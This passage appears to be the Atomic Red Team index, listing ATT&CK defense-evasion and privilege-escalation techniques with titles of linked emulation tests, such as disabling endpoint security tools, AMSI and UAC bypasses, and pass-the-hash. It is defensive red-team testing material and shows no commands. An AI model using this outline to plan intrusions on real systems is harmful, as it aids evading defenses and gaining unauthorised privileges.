- T1122 Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1502 Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1149 LC_MAIN Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1170 Mshta [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218.001 Signed Binary Proxy Execution: Compiled HTML File](../../T1218.001/T1218.001.md)
- Atomic Test #1: Compiled HTML Help Local Payload [windows]
- Atomic Test #2: Compiled HTML Help Remote Payload [windows]
- Atomic Test #3: Invoke CHM with default Shortcut Command Execution [windows]
- Atomic Test #4: Invoke CHM with InfoTech Storage Protocol Handler [windows]
- Atomic Test #5: Invoke CHM Simulate Double click [windows]
- Atomic Test #6: Invoke CHM with Script Engine and Help Topic [windows]
- Atomic Test #7: Invoke CHM Shortcut Command with ITS and Help Topic [windows]
- Atomic Test #8: Decompile Local CHM File [windows]
- [T1070.005 Indicator Removal on Host: Network Share Connection Removal](../../T1070.005/T1070.005.md)
- Atomic Test #1: Add Network Share [windows]
- Atomic Test #2: Remove Network Share [windows]
- Atomic Test #3: Remove Network Share PowerShell [windows]
- Atomic Test #4: Disable Administrative Share Creation at Startup [windows]
- Atomic Test #5: Remove Administrative Shares [windows]
- [T1562.001 Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md)
- Atomic Test #1: Disable syslog [linux]
- Atomic Test #2: Disable Cb Response [linux]
- Atomic Test #3: Disable SELinux [linux]
- Atomic Test #4: Stop Crowdstrike Falcon on Linux [linux]
- Atomic Test #5: Disable Carbon Black Response [macos]
- Atomic Test #6: Disable LittleSnitch [macos]
- Atomic Test #7: Disable OpenDNS Umbrella [macos]
- Atomic Test #8: Disable macOS Gatekeeper [macos]
- Atomic Test #9: Stop and unload Crowdstrike Falcon on macOS [macos]
- Atomic Test #10: Unload Sysmon Filter Driver [windows]
- Atomic Test #11: Uninstall Sysmon [windows]
- Atomic Test #12: AMSI Bypass - AMSI InitFailed [windows]
- Atomic Test #13: AMSI Bypass - Remove AMSI Provider Reg Key [windows]
- Atomic Test #14: Disable Arbitrary Security Windows Service [windows]
- Atomic Test #15: Tamper with Windows Defender ATP PowerShell [windows]
- Atomic Test #16: Tamper with Windows Defender Command Prompt [windows]
- Atomic Test #17: Tamper with Windows Defender Registry [windows]
- Atomic Test #18: Disable Microsoft Office Security Features [windows]
- Atomic Test #19: Remove Windows Defender Definition Files [windows]
- Atomic Test #20: Stop and Remove Arbitrary Security Windows Service [windows]
- Atomic Test #21: Uninstall Crowdstrike Falcon on Windows [windows]
- Atomic Test #22: Tamper with Windows Defender Evade Scanning -Folder [windows]
- Atomic Test #23: Tamper with Windows Defender Evade Scanning -Extension [windows]
- Atomic Test #24: Tamper with Windows Defender Evade Scanning -Process [windows]
- Atomic Test #25: office-365-Disable-AntiPhishRule [office-365]
- Atomic Test #26: Disable Windows Defender with DISM [windows]
- Atomic Test #27: Disable Defender Using NirSoft AdvancedRun [windows]
- Atomic Test #28: Kill antimalware protected processes using Backstab [windows]
- Atomic Test #29: WinPwn - Kill the event log services for stealth [windows]
- Atomic Test #30: Tamper with Windows Defender ATP using Aliases - PowerShell [windows]
- Atomic Test #31: LockBit Black - Disable Privacy Settings Experience Using Registry -cmd [windows]
- Atomic Test #32: LockBit Black - Use Registry Editor to turn on automatic logon -cmd [windows]
- Atomic Test #33: LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell [windows]
- Atomic Test #34: LockBit Black - Use Registry Editor to turn on automatic logon -Powershell [windows]
- Atomic Test #35: Disable Windows Defender with PwSh Disable-WindowsOptionalFeature [windows]
- Atomic Test #36: WMIC Tamper with Windows Defender Evade Scanning Folder [windows]
- Atomic Test #37: Delete Windows Defender Scheduled Tasks [windows]
- Atomic Test #38: Clear History [linux]
- Atomic Test #39: Suspend History [linux]
- Atomic Test #40: Reboot Linux Host via Kernel System Request [linux]
- Atomic Test #41: Clear Paging Cache [linux]
- Atomic Test #42: Disable Memory Swap [linux]
- Atomic Test #43: Disable Hypervisor-Enforced Code Integrity (HVCI) [windows]
- T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1073 DLL Side-Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1055.012 Process Injection: Process Hollowing](../../T1055.012/T1055.012.md)
- Atomic Test #1: Process Hollowing using PowerShell [windows]
- Atomic Test #2: RunPE via VBA [windows]
- T1564.009 Resource Forking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
- Atomic Test #1: Decode base64 Data into Script [macos, linux]
- Atomic Test #2: Execute base64-encoded PowerShell [windows]
- Atomic Test #3: Execute base64-encoded PowerShell from Windows Registry [windows]
- Atomic Test #4: Execution from Compressed File [windows]
- Atomic Test #5: DLP Evasion via Sensitive Data in VBA Macro over email [windows]
- Atomic Test #6: DLP Evasion via Sensitive Data in VBA Macro over HTTP [windows]
- Atomic Test #7: Obfuscated Command in PowerShell [windows]
- Atomic Test #8: Obfuscated Command Line using special Unicode characters [windows]
- Atomic Test #9: Snake Malware Encrypted crmlog file [windows]
- Atomic Test #10: Execution from Compressed JScript File [windows]
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.001 Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1564.006 Run Virtual Instance](../../T1564.006/T1564.006.md)
- Atomic Test #1: Register Portable Virtualbox [windows]
- Atomic Test #2: Create and start VirtualBox virtual machine [windows]
- Atomic Test #3: Create and start Hyper-V virtual machine [windows]
- [T1134.005 Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md)
- Atomic Test #1: Injection SID-History with mimikatz [windows]
- T1599 Network Boundary Bridging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1553 Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218.010 Signed Binary Proxy Execution: Regsvr32](../../T1218.010/T1218.010.md)
- Atomic Test #1: Regsvr32 local COM scriptlet execution [windows]
- Atomic Test #2: Regsvr32 remote COM scriptlet execution [windows]
- Atomic Test #3: Regsvr32 local DLL execution [windows]
- Atomic Test #4: Regsvr32 Registering Non DLL [windows]
- Atomic Test #5: Regsvr32 Silent DLL Install Call DllRegisterServer [windows]
- [T1036.003 Masquerading: Rename System Utilities](../../T1036.003/T1036.003.md)
- Atomic Test #1: Masquerading as Windows LSASS process [windows]
- Atomic Test #2: Masquerading as Linux crond process [linux]
- Atomic Test #3: Masquerading - cscript.exe running as notepad.exe [windows]
- Atomic Test #4: Masquerading - wscript.exe running as svchost.exe [windows]
- Atomic Test #5: Masquerading - powershell.exe running as taskhostw.exe [windows]
- Atomic Test #6: Masquerading - non-windows exe running as windows exe [windows]
- Atomic Test #7: Masquerading - windows exe running as different windows exe [windows]
- Atomic Test #8: Malicious process Masquerading as LSM.exe [windows]
- Atomic Test #9: File Extension Masquerading [windows]
- T1562.011 Spoof Security Alerting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
- T1186 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.003 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218.009 Signed Binary Proxy Execution: Regsvcs/Regasm](../../T1218.009/T1218.009.md)
- Atomic Test #1: Regasm Uninstall Method Call Test [windows]
- Atomic Test #2: Regsvcs Uninstall Method Call Test [windows]
- T1506 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1553.004 Subvert Trust Controls: Install Root Certificate](../../T1553.004/T1553.004.md)
- Atomic Test #1: Install root CA on CentOS/RHEL [linux]
- Atomic Test #2: Install root CA on Debian/Ubuntu [linux]
- Atomic Test #3: Install root CA on macOS [macos]
- Atomic Test #4: Install root CA on Windows [windows]
- Atomic Test #5: Install root CA on Windows with certutil [windows]
- Atomic Test #6: Add Root Certificate to CurrentUser Certificate Store [windows]
- [T1027.004 Obfuscated Files or Information: Compile After Delivery](../../T1027.004/T1027.004.md)
- Atomic Test #1: Compile After Delivery using csc.exe [windows]
- Atomic Test #2: Dynamic C# Compile [windows]
- Atomic Test #3: C compile [linux, macos]
- Atomic Test #4: CC compile [linux, macos]
- Atomic Test #5: Go compile [linux, macos]
- T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1197 BITS Jobs](../../T1197/T1197.md)
- Atomic Test #1: Bitsadmin Download (cmd) [windows]
- Atomic Test #2: Bitsadmin Download (PowerShell) [windows]
- Atomic Test #3: Persist, Download, & Execute [windows]
- Atomic Test #4: Bits download using desktopimgdownldr.exe (cmd) [windows]
- [T1127.001 Trusted Developer Utilities Proxy Execution: MSBuild](../../T1127.001/T1127.001.md)
- Atomic Test #1: MSBuild Bypass Using Inline Tasks (C#) [windows]
- Atomic Test #2: MSBuild Bypass Using Inline Tasks (VB) [windows]
- T1088 Bypass User Account Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.008 Impair Defenses: Disable Cloud Logs](../../T1562.008/T1562.008.md)
- Atomic Test #1: AWS - CloudTrail Changes [iaas:aws]
- Atomic Test #2: Azure - Eventhub Deletion [iaas:azure]
- Atomic Test #3: Office 365 - Exchange Audit Log Disabled [office-365]
- Atomic Test #4: AWS - Disable CloudTrail Logging Through Event Selectors using Stratus [linux, macos]
- Atomic Test #5: AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus [linux, macos]
- Atomic Test #6: AWS - Remove VPC Flow Logs using Stratus [linux, macos]
- Atomic Test #7: AWS - CloudWatch Log Group Deletes [iaas:aws]
- Atomic Test #8: AWS CloudWatch Log Stream Deletes [iaas:aws]
- Atomic Test #9: Office 365 - Set Audit Bypass For a Mailbox [office-365]
- [T1564.003 Hide Artifacts: Hidden Window](../../T1564.003/T1564.003.md)
- Atomic Test #1: Hidden Window [windows]
- T1147 Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1578.002 Create Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1500 Compile After Delivery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1223 Compiled HTML File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1601.001 Patch System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1146 Clear Command History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027.006 HTML Smuggling](../../T1027.006/T1027.006.md)
- Atomic Test #1: HTML Smuggling Remote Payload [windows]
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1130 Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.004 Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md)
- Atomic Test #1: Delete a single file - Linux/macOS [linux, macos]
- Atomic Test #2: Delete an entire folder - Linux/macOS [linux, macos]
- Atomic Test #3: Overwrite and delete a file with shred [linux]
- Atomic Test #4: Delete a single file - Windows cmd [windows]
- Atomic Test #5: Delete an entire folder - Windows cmd [windows]
- Atomic Test #6: Delete a single file - Windows PowerShell [windows]
- Atomic Test #7: Delete an entire folder - Windows PowerShell [windows]
- Atomic Test #8: Delete Filesystem - Linux [linux]
- Atomic Test #9: Delete Prefetch File [windows]
- Atomic Test #10: Delete TeamViewer Log Files [windows]
- T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1221 Template Injection](../../T1221/T1221.md)
- Atomic Test #1: WINWORD Remote Template Injection [windows]
- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027.002 Obfuscated Files or Information: Software Packing](../../T1027.002/T1027.002.md)
- Atomic Test #1: Binary simply packed by UPX (linux) [linux]
- Atomic Test #2: Binary packed by UPX, with modified headers (linux) [linux]
- Atomic Test #3: Binary simply packed by UPX [macos]
- Atomic Test #4: Binary packed by UPX, with modified headers [macos]
- T1564.005 Hidden File System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1151 Space after Filename [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1036.006 Masquerading: Space after Filename](../../T1036.006/T1036.006.md)
- Atomic Test #1: Space After Filename (Manual) [macos]
- Atomic Test #2: Space After Filename [macos, linux]
- [T1550.002 Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md)
- Atomic Test #1: Mimikatz Pass the Hash [windows]
- Atomic Test #2: crackmapexec Pass the Hash [windows]
- Atomic Test #3: Invoke-WMIExec Pass the Hash [windows]
- [T1574.002 Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows]
- T1126 Network Share Connection Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.007 Dynamic API Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.015 ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1220 XSL Script Processing](../../T1220/T1220.md)
- Atomic Test #1: MSXSL Bypass using local files [windows]
- Atomic Test #2: MSXSL Bypass using remote files [windows]
- Atomic Test #3: WMIC bypass using local XSL file [windows]
- Atomic Test #4: WMIC bypass using remote XSL file [windows]
- [T1564.001 Hide Artifacts: Hidden Files and Directories](../../T1564.001/T1564.001.md)
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
- Atomic Test #2: Mac Hidden file [macos]
- Atomic Test #3: Create Windows System File with Attrib [windows]
- Atomic Test #4: Create Windows Hidden File with Attrib [windows]
- Atomic Test #5: Hidden files [macos]
- Atomic Test #6: Hide a Directory [macos]
- Atomic Test #7: Show all hidden files [macos]
- Atomic Test #8: Hide Files Through Registry [windows]
- T1578.001 Create Snapshot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
- Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
- T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1564.004 Hide Artifacts: NTFS File Attributes](../../T1564.004/T1564.004.md)
- Atomic Test #1: Alternate Data Streams (ADS) [windows]
- Atomic Test #2: Store file in Alternate Data Stream (ADS) [windows]
- Atomic Test #3: Create ADS command prompt [windows]
- Atomic Test #4: Create ADS PowerShell [windows]
- T1096 NTFS File Attributes [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1055.001 Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md)
- Atomic Test #1: Process Injection via mavinject.exe [windows]
- Atomic Test #2: WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique [windows]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1216 Signed Script Proxy Execution](../../T1216/T1216.md)
- Atomic Test #1: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows]
- Atomic Test #2: manage-bde.wsf Signed Script Command Execution [windows]
- T1118 InstallUtil [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1601.002 Downgrade System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #1: Create local account with admin privileges [windows]
- Atomic Test #2: Create local account with admin privileges - MacOS [macos]
- Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
- Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
- Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
- Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
- Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
- Atomic Test #8: Create local account (Linux) [linux]
- Atomic Test #9: Reactivate a locked/expired account (Linux) [linux]
- Atomic Test #10: Login as nobody (Linux) [linux]
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1127 Trusted Developer Utilities Proxy Execution](../../T1127/T1127.md)
- Atomic Test #1: Lolbin Jsc.exe compile javascript to exe [windows]
- Atomic Test #2: Lolbin Jsc.exe compile javascript to dll [windows]
- T1218.014 MMC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.010 Process Argument Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md)
- Atomic Test #1: User scope COR_PROFILER [windows]
- Atomic Test #2: System Scope COR_PROFILER [windows]
- Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
# privilege-escalation
- T1055.011 Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.005 Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md)
- Atomic Test #1: Scheduled Task Startup Script [windows]
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
- Atomic Test #5: Task Scheduler via VBA [windows]
- Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows]
- Atomic Test #7: Scheduled Task Executing Base64 Encoded Commands From Registry [windows]
- Atomic Test #8: Import XML Schedule Task with Hidden Attribute [windows]
- Atomic Test #9: PowerShell Modify A Scheduled Task [windows]
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1150 Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1044 File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.013 Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md)
- Atomic Test #1: Append malicious start-process cmdlet [windows]
- T1514 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.006 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.007 Kubernetes Cronjob](../../T1053.007/T1053.007.md)
- Atomic Test #1: ListCronjobs [containers]
- Atomic Test #2: CreateCronjob [containers]
- [T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md)
- Atomic Test #1: Bypass UAC using Event Viewer (cmd) [windows]
- Atomic Test #2: Bypass UAC using Event Viewer (PowerShell) [windows]
- Atomic Test #3: Bypass UAC using Fodhelper [windows]
- Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows]
- Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- Atomic Test #8: Disable UAC using reg.exe [windows]
- Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
- Atomic Test #10: UACME Bypass Method 23 [windows]
- Atomic Test #11: UACME Bypass Method 31 [windows]
- Atomic Test #12: UACME Bypass Method 33 [windows]
- Atomic Test #13: UACME Bypass Method 34 [windows]
- Atomic Test #14: UACME Bypass Method 39 [windows]
- Atomic Test #15: UACME Bypass Method 56 [windows]
- Atomic Test #16: UACME Bypass Method 59 [windows]
- Atomic Test #17: UACME Bypass Method 61 [windows]
- Atomic Test #18: WinPwn - UAC Magic [windows]
- Atomic Test #19: WinPwn - UAC Bypass ccmstp technique [windows]
- Atomic Test #20: WinPwn - UAC Bypass DiskCleanup technique [windows]
- Atomic Test #21: WinPwn - UAC Bypass DccwBypassUAC technique [windows]
- Atomic Test #22: Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key [windows]
- Atomic Test #23: UAC Bypass with WSReset Registry Modification [windows]
- [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
- Atomic Test #1: Sudo usage [macos, linux]
- Atomic Test #2: Unlimited sudo cache timeout [macos, linux]
- Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
- [T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
- Atomic Test #1: Service Registry Permissions Weakness [windows]
- Atomic Test #2: Service ImagePath Change with reg.exe [windows]
- T1178 SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547 Boot or Logon Autostart Execution](../../T1547/T1547.md)
- Atomic Test #1: Add a driver [windows]
- T1013 Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1206 Sudo Caching [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.014 Active Setup](../../T1547.014/T1547.014.md)
- Atomic Test #1: HKLM - Add atomic_test key to launch executable as part of user setup [windows]
- Atomic Test #2: HKLM - Add malicious StubPath value to existing Active Setup Entry [windows]
- Atomic Test #3: HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number [windows]
- [T1484.002 Domain Trust Modification](../../T1484.002/T1484.002.md)
- Atomic Test #1: Add Federation to Azure AD [azure-ad]
- [T1543.003 Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md)
- Atomic Test #1: Modify Fax service to run PowerShell [windows]
- Atomic Test #2: Service Installation CMD [windows]
- Atomic Test #3: Service Installation PowerShell [windows]
- Atomic Test #4: TinyTurla backdoor service w64time [windows]
- Atomic Test #5: Remote Service Installation CMD [windows]
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
- T1165 Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.012 Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.001 Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
- T1103 AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1058 Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1055.003 Thread Execution Hijacking](../../T1055.003/T1055.003.md)
- Atomic Test #1: Thread Execution Hijacking [windows]
- [T1546.011 Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md)
- Atomic Test #1: Application Shim Installation [windows]
- Atomic Test #2: New shim database files created in the default shim database directory [windows]
- Atomic Test #3: Registry key creation and/or modification events for SDB [windows]
- [T1547.010 Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md)
- Atomic Test #1: Add Port Monitor persistence in Registry [windows]
- [T1037.002 Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md)
- Atomic Test #1: Logon Scripts - Mac [macos]
- [T1055 Process Injection](../../T1055/T1055.md)
- Atomic Test #1: Shellcode execution via VBA [windows]
- Atomic Test #2: Remote Process Injection in LSASS via mimikatz [windows]
- Atomic Test #3: Section View Injection [windows]
- T1038 DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1050 New Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1611 Escape to Host](../../T1611/T1611.md)
- Atomic Test #1: Deploy container using nsenter container escape [containers]
- Atomic Test #2: Mount host filesystem to escape privileged Docker container [containers]
- [T1547.009 Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md)
- Atomic Test #1: Shortcut Modification [windows]
- Atomic Test #2: Create shortcut to cmd in startup folders [windows]
- T1182 AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.005 Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md)
- Atomic Test #1: Modify SSP configuration in registry [windows]
- T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1543.004 Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md)
- Atomic Test #1: Launch Daemon [macos]
- [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
- Atomic Test #1: PowerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
- [T1484.001 Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md)
- Atomic Test #1: LockBit Black - Modify Group policy settings -cmd [windows]
- Atomic Test #2: LockBit Black - Modify Group policy settings -Powershell [windows]
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
